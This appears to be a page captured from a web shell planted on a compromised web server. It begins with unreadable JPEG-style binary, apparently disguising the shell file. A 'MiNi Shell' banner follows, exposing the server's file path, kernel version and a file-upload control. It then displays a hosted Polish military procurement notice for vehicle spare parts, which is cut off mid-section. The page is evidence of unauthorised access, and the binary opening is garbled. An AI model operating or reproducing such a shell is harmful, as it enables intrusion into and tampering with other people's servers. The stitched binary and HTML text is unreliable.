JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250606/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250606/0026568201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa części zapasowych do pojazdów do transportu towarów, pojazdów pasażersko towarowych i samochodów z podziałem na cztery (4) zadania. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">25. Wojskowy Oddział Gospodarczy w Białymstoku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 200689828</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kawaleryjska 70</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Białystok</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">15-325</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">25wog.kancelaria@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.25wog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa części zapasowych do pojazdów do transportu towarów, pojazdów pasażersko towarowych i samochodów z podziałem na cztery (4) zadania. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-96f32e9a-b549-474d-aa38-4fc8454910a2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00265682</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00005926/17/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.10 Dostawa części zapasowych do pojazdów do transportów, pojazdów pasażersko towarowych i samochodów z podziałem na 4 zadania</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Zamawiający informuje, iż wszelka komunikacja z Wykonawcami odbywać się będzie wyłącznie poprzez platformę zakupową, pod adresem internetowym: https://platformazakupowa.pl/pn/25wog_wp.<br/>2.	Zgodnie z art. 61. ust. 1. oraz art. 63 ust. 2 komunikacja w postępowaniu <br/>o udzielenie zamówienia, w tym składanie ofert, wymiana informacji <br/>oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym <br/>a Wykonawcą odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">40/W1/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: „Dostawa części zapasowych do pojazdów do transportu towarów, pojazdów pasażersko towarowych i samochodów z podziałem na cztery (4) zadania.” <br/>ZADANIE Nr 1 - HONKER<br/>Szczegółowa lista asortymentowa wraz z ilościami podana jest <br/>w formularzu cenowym (załącznik nr 3 do SWZ).<br/>1.	Dostarczony Asortyment powinien być fabrycznie nowy, wolny od wad fizycznych <br/>i prawnych, nieużywany i nieregenerowany co powinno być odzwierciedlone <br/>w „Protokole przyjęcia – przekazania.<br/>2.	Wszystkie materiały – wyroby muszą być dopuszczone do obrotu i powszechnego stosowania zgodnie z obowiązującym prawem, na podstawie certyfikatów zgodności.<br/>3.	Dostarczony Asortyment powinien być wykonany zgodnie z dokumentacją techniczną <br/>i wymaganiami technicznymi opracowanymi przez producenta, spełniające wymagania jakościowe określone w dokumentacji technicznej producenta na dany wybór, zgodnie <br/>z oznaczeniem katalogowym.<br/>4.	Dostarczony Asortyment powinien być opakowany i zakonserwowany metodą zapewniającą zachowanie właściwości oraz parametrów techniczno-eksploatacyjnych podczas transportu oraz przechowywania w warunkach magazynowych przez co najmniej 24 miesiące od daty realizacji przedmiotu umowy.<br/>5.	Dostarczony Asortyment powinien być dostarczony w opakowaniach fabrycznych <br/>z oznaczeniami producenta i numerami katalogowymi, jeżeli występują. Jeżeli nie występuje opakowanie zewnętrzne dostarczonych artykułów muszą posiadać informację umożliwiającą identyfikację poszczególnych artykułów (ilość, rodzaj, parametry techniczne) bez konieczności naruszania opakowania, które powinno posiadać wszelkie zabezpieczenia stosowane przez producenta (np. hologramy).<br/>Zakres rzeczowy przedmiotu umowy składa się z zamówienia podstawowego <br/>oraz zamówienia objętego prawem opcji.<br/>UWAGA!<br/>Szczegółowy zakres przedmiotu zamówienia określają: opis zawarty w formularzu cenowym (załącznik nr 3) oraz projektowane postanowienia umowy (załącznik nr 4 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34330000-9 - Części zapasowe do pojazdów do transportu towarów, pojazdów pasażersko-towarowych i samochodów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 8.	Zakres rzeczowy przedmiotu umowy składa się z zamówienia podstawowego oraz zamówienia objętego prawem opcji*.<br/>9.	Zamawiający uprawniony jest do skorzystania z prawa opcji przez cały okres obowiązywania umowy, a Wykonawca zobowiązany jest dostarczyć Asortyment objęty prawem opcji* po cenach jednostkowych wskazanych w swojej ofercie.<br/>10.	Do zamówień objętych prawem opcji* stosuje się postanowienia odnoszące się <br/>do zamówienia podstawowego.<br/>11.	Zamawiający skorzysta z prawa opcji* w przypadku wystąpienia potrzeby pozyskania dodatkowych ilości Asortymentu.<br/>12.	Zamawiający zastrzega sobie prawo do nie wykorzystania całości bądź części zamówienia objętego prawem opcji*, a Wykonawca oświadcza, iż nie będzie z tego powodu wnosił żadnych roszczeń.<br/>13.	Warunkiem uruchomienia prawa opcji* jest oświadczenie woli Zamawiającego <br/>o uruchomieniu prawa opcji poprzez poinformowanie Wykonawcy stosownym pismem <br/>- przesłania przez Zamawiającego zapotrzebowania podpisanego przez Szefa Służby <br/>z 25. Wojskowego Oddziału Gospodarczego w Białymstoku <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a.)	Kryterium cena – 60 % wartości zamówienia (brutto)<br/>Cena powinna obejmować koszt wykonania całości zamówienia, w tym wszystkie koszty pośrednie związane z wykonywaniem zamówienia.<br/><br/>wartość oferty najniższej <br/>----------------------------------- x 60 pkt = liczba punktów uzyskanych<br/>wartość oferty rozpatrywanej <br/><br/>b.)	Kryterium ,,termin dostawy’’- 40 %<br/>Dostawa zamówienia podstawowego od momentu zawarcia umowy:<br/>- 1-5 dni roboczych: 40% (40 pkt),<br/>- 6-10 dni roboczych: 30% (30 pkt),<br/>- 11-15 dni roboczych: 20% (20 pkt),<br/>- 16-21 dni roboczych: 10% (10 pkt),</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN DOSTAWY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: „Dostawa części zapasowych do pojazdów do transportu towarów, pojazdów pasażersko towarowych i samochodów z podziałem na cztery (4) zadania.” <br/>ZADANIE Nr 1 - HONKER<br/>ZADANIE Nr 2 – MERCEDES<br/>ZADANIE Nr 3 - RENAULT, VOLVO, SCANIA<br/>ZADANIE Nr 4 – Naczepa NS-600W<br/><br/>Szczegółowa lista asortymentowa wraz z ilościami podana jest <br/>w formularzu cenowym (załącznik nr 3 do SWZ).<br/>1.	Dostarczony Asortyment powinien być fabrycznie nowy, wolny od wad fizycznych <br/>i prawnych, nieużywany i nieregenerowany co powinno być odzwierciedlone <br/>w „Protokole przyjęcia – przekazania.<br/>2.	Wszystkie materiały – wyroby muszą być dopuszczone do obrotu i powszechnego stosowania zgodnie z obowiązującym prawem, na podstawie certyfikatów zgodności.<br/>3.	Dostarczony Asortyment powinien być wykonany zgodnie z dokumentacją techniczną <br/>i wymaganiami technicznymi opracowanymi przez producenta, spełniające wymagania jakościowe określone w dokumentacji technicznej producenta na dany wybór, zgodnie <br/>z oznaczeniem katalogowym.<br/>4.	Dostarczony Asortyment powinien być opakowany i zakonserwowany metodą zapewniającą zachowanie właściwości oraz parametrów techniczno-eksploatacyjnych podczas transportu oraz przechowywania w warunkach magazynowych przez co najmniej 24 miesiące od daty realizacji przedmiotu umowy.<br/>5.	Dostarczony Asortyment powinien być dostarczony w opakowaniach fabrycznych <br/>z oznaczeniami producenta i numerami katalogowymi, jeżeli występują. Jeżeli nie występuje opakowanie zewnętrzne dostarczonych artykułów muszą posiadać informację umożliwiającą identyfikację poszczególnych artykułów (ilość, rodzaj, parametry techniczne) bez konieczności naruszania opakowania, które powinno posiadać wszelkie zabezpieczenia stosowane przez producenta (np. hologramy).<br/>Zakres rzeczowy przedmiotu umowy składa się z zamówienia podstawowego <br/>oraz zamówienia objętego prawem opcji.<br/>UWAGA!<br/>Szczegółowy zakres przedmiotu zamówienia określają: opis zawarty w formularzu cenowym (załącznik nr 3) oraz projektowane postanowienia umowy (załącznik nr 4 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34330000-9 - Części zapasowe do pojazdów do transportu towarów, pojazdów pasażersko-towarowych i samochodów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Wykonawca oświadcza, iż zrealizuje postanowienia niniejszej umowy zgodnie ze złożoną ofertą, w sposób profesjonalny oraz z najwyższą starannością.<br/>Zakres rzeczowy przedmiotu umowy składa się z zamówienia podstawowego oraz zamówienia objętego prawem opcji*.<br/>Zamawiający uprawniony jest do skorzystania z prawa opcji przez cały okres obowiązywania umowy, a Wykonawca zobowiązany jest dostarczyć Asortyment objęty prawem opcji* po cenach jednostkowych wskazanych w swojej ofercie.<br/>Do zamówień objętych prawem opcji* stosuje się postanowienia odnoszące się <br/>do zamówienia podstawowego.<br/>Zamawiający skorzysta z prawa opcji* w przypadku wystąpienia potrzeby pozyskania dodatkowych ilości Asortymentu.<br/>12.	Zamawiający zastrzega sobie prawo do nie wykorzystania całości bądź części zamówienia objętego prawem opcji*, a Wykonawca oświadcza, iż nie będzie z tego powodu wnosił żadnych roszczeń.<br/>13.	Warunkiem uruchomienia prawa opcji* jest oświadczenie woli Zamawiającego <br/>o uruchomieniu prawa opcji poprzez poinformowanie Wykonawcy stosownym pismem <br/>- przesłania przez Zamawiającego zapotrzebowania podpisanego przez Szefa Służby <br/>z 25. Wojskowego Oddziału Gospodarczego w Białymstoku <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a.)	Kryterium cena – 60 % wartości zamówienia (brutto)<br/>Cena powinna obejmować koszt wykonania całości zamówienia, w tym wszystkie koszty pośrednie związane z wykonywaniem zamówienia.<br/><br/>wartość oferty najniższej <br/>----------------------------------- x 60 pkt = liczba punktów uzyskanych<br/>wartość oferty rozpatrywanej <br/><br/>b.)	Kryterium ,,termin dostawy’’- 40 %<br/>Dostawa zamówienia podstawowego od momentu zawarcia umowy:<br/>- 1-5 dni roboczych: 40% (40 pkt),<br/>- 6-10 dni roboczych: 30% (30 pkt),<br/>- 11-15 dni roboczych: 20% (20 pkt),<br/>- 16-21 dni roboczych: 10% (10 pkt),</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN DOSTAWY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: „Dostawa części zapasowych do pojazdów do transportu towarów, pojazdów pasażersko towarowych i samochodów z podziałem na cztery (4) zadania.” <br/>ZADANIE Nr 1 - HONKER<br/>ZADANIE Nr 2 – MERCEDES<br/>ZADANIE Nr 3 - RENAULT, VOLVO, SCANIA<br/>ZADANIE Nr 4 – Naczepa NS-600W<br/><br/>Szczegółowa lista asortymentowa wraz z ilościami podana jest <br/>w formularzu cenowym (załącznik nr 3 do SWZ).<br/>1.	Dostarczony Asortyment powinien być fabrycznie nowy, wolny od wad fizycznych <br/>i prawnych, nieużywany i nieregenerowany co powinno być odzwierciedlone <br/>w „Protokole przyjęcia – przekazania.<br/>2.	Wszystkie materiały – wyroby muszą być dopuszczone do obrotu i powszechnego stosowania zgodnie z obowiązującym prawem, na podstawie certyfikatów zgodności.<br/>3.	Dostarczony Asortyment powinien być wykonany zgodnie z dokumentacją techniczną <br/>i wymaganiami technicznymi opracowanymi przez producenta, spełniające wymagania jakościowe określone w dokumentacji technicznej producenta na dany wybór, zgodnie <br/>z oznaczeniem katalogowym.<br/>4.	Dostarczony Asortyment powinien być opakowany i zakonserwowany metodą zapewniającą zachowanie właściwości oraz parametrów techniczno-eksploatacyjnych podczas transportu oraz przechowywania w warunkach magazynowych przez co najmniej 24 miesiące od daty realizacji przedmiotu umowy.<br/>5.	Dostarczony Asortyment powinien być dostarczony w opakowaniach fabrycznych <br/>z oznaczeniami producenta i numerami katalogowymi, jeżeli występują. Jeżeli nie występuje opakowanie zewnętrzne dostarczonych artykułów muszą posiadać informację umożliwiającą identyfikację poszczególnych artykułów (ilość, rodzaj, parametry techniczne) bez konieczności naruszania opakowania, które powinno posiadać wszelkie zabezpieczenia stosowane przez producenta (np. hologramy).<br/>Zakres rzeczowy przedmiotu umowy składa się z zamówienia podstawowego <br/>oraz zamówienia objętego prawem opcji.<br/>UWAGA!<br/>Szczegółowy zakres przedmiotu zamówienia określają: opis zawarty w formularzu cenowym (załącznik nr 3) oraz projektowane postanowienia umowy (załącznik nr 4 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34330000-9 - Części zapasowe do pojazdów do transportu towarów, pojazdów pasażersko-towarowych i samochodów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 7.	Wykonawca oświadcza, iż zrealizuje postanowienia niniejszej umowy zgodnie ze złożoną ofertą, w sposób profesjonalny oraz z najwyższą starannością.<br/>8.	Zakres rzeczowy przedmiotu umowy składa się z zamówienia podstawowego oraz zamówienia objętego prawem opcji*.<br/>9.	Zamawiający uprawniony jest do skorzystania z prawa opcji przez cały okres obowiązywania umowy, a Wykonawca zobowiązany jest dostarczyć Asortyment objęty prawem opcji* po cenach jednostkowych wskazanych w swojej ofercie.<br/>10.	Do zamówień objętych prawem opcji* stosuje się postanowienia odnoszące się <br/>do zamówienia podstawowego.<br/>11.	Zamawiający skorzysta z prawa opcji* w przypadku wystąpienia potrzeby pozyskania dodatkowych ilości Asortymentu.<br/>12.	Zamawiający zastrzega sobie prawo do nie wykorzystania całości bądź części zamówienia objętego prawem opcji*, a Wykonawca oświadcza, iż nie będzie z tego powodu wnosił żadnych roszczeń.<br/>13.	Warunkiem uruchomienia prawa opcji* jest oświadczenie woli Zamawiającego <br/>o uruchomieniu prawa opcji poprzez poinformowanie Wykonawcy stosownym pismem <br/>- przesłania przez Zamawiającego zapotrzebowania podpisanego przez Szefa Służby <br/>z 25. Wojskowego Oddziału Gospodarczego w Białymstoku <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a.)	Kryterium cena – 60 % wartości zamówienia (brutto)<br/>Cena powinna obejmować koszt wykonania całości zamówienia, w tym wszystkie koszty pośrednie związane z wykonywaniem zamówienia.<br/><br/>wartość oferty najniższej <br/>----------------------------------- x 60 pkt = liczba punktów uzyskanych<br/>wartość oferty rozpatrywanej <br/><br/>b.)	Kryterium ,,termin dostawy’’- 40 %<br/>Dostawa zamówienia podstawowego od momentu zawarcia umowy:<br/>- 1-5 dni roboczych: 40% (40 pkt),<br/>- 6-10 dni roboczych: 30% (30 pkt),<br/>- 11-15 dni roboczych: 20% (20 pkt),<br/>- 16-21 dni roboczych: 10% (10 pkt),</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny 